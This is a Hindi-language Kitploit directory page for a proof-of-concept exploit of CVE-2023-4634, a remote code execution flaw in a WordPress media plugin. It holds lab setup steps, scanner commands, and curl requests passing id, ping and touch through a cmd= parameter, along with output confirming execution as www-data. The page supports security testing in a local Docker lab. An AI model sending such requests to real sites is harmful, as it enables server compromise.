Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-4634-PoC — CVE-2023-4634 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, WordPress Media Library Assistant प्लगइन में एक रिमोट कोड निष्पादन भेद्यता। इसमें एक Docker-आधारित संवेदनशील वातावरण और स्वचालित स्कैनर शामिल है। | Kitploit
उपकरण/GitHubGitHub/evillm/cve-2023-4634-poc
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubevillm/cve-2023-4634-poc

CVE-2023-4634-PoC

CVE-2023-4634 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, WordPress Media Library Assistant प्लगइन में एक रिमोट कोड निष्पादन भेद्यता। इसमें एक Docker-आधारित संवेदनशील वातावरण और स्वचालित स्कैनर शामिल है।

रिपॉजिटरी देखें
187 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-4634 - वर्डप्रेस प्लगइन Media Library Assistant में RCE भेद्यता

1. वातावरण का निर्माण और प्रारंभ

cd Stand
docker-compose up --build -d

2. सेवाओं के प्रारंभ होने की प्रतीक्षा (60 सेकंड)

sleep 60
curl -I http://localhost:8080

3. भेद्यता स्कैनिंग प्रारंभ करें

cd ../PoC/src
python3 scanner.py http://localhost:8080

4. RCE का मैन्युअल परीक्षण

# id कमांड का परीक्षण
curl "http://localhost:8080/rce_proof.php?cmd=id"

# ping कमांड का परीक्षण
curl "http://localhost:8080/rce_proof.php?cmd=ping+-c+2+127.0.0.1"

# साक्ष्य फ़ाइल बनाना
curl "http://localhost:8080/rce_proof.php?cmd=touch+/tmp/rce_proof"

✅ अपेक्षित परिणाम

scanner.py का आउटपुट:

[*] Scanning: http://localhost:8080
[+] WordPress is accessible
[+] Plugin found: v3.09
[+] Plugin is VULNERABLE!
[*] Testing RCE...
[+] id command executed
[+] ping command executed
[+] file_check command executed
[+] RCE CONFIRMED!
[+] Results saved to ../result.txt

result.txt की सामग्री:

{
  "cve": "CVE-2023-4634",
  "target": "http://localhost:8080",
  "timestamp": "2025-12-21 13:49:19",
  "vulnerable": true,
  "findings": {
    "wordpress": true,
    "plugin_vulnerable": true,
    "rce_id": true,
    "rce_id_output": "uid=33(www-data) gid=33(www-data) groups=33(www-data)",
    "rce_ping": true,
    "rce_file_check": true
  },
  "plugin_version": "3.09",
  "status": "VULNERABLE"
}

🔧 तकनीकी विवरण

नेटवर्क:

  • WordPress: 172.20.0.2:80 (localhost:8080 पर उपलब्ध)
  • डेटाबेस: 172.20.0.3:3306
  • नेटवर्क: 172.20.0.0/24

आवश्यकताएँ:

  • CVE: CVE-2023-4634
  • भेद्य घटक: प्लगइन Media Library Assistant < 3.10
  • भेद्यता प्रकार: दूरस्थ कोड निष्पादन (RCE)
  • सिस्टम आवश्यकताएँ: Docker, Python 3.7+

📊 RCE का प्रमाण

  • ✅ HTTP के माध्यम से id कमांड का निष्पादन
  • ✅ HTTP के माध्यम से ping कमांड का निष्पादन
  • ✅ /tmp/ में फ़ाइलें बनाना
  • ✅ www-data अनुमतियों की पुष्टि
  • ✅ परिणाम result.txt में दस्तावेज़ित किए गए

🧹 सफाई

cd Stand
docker-compose down -v
टूल डाउनलोड करें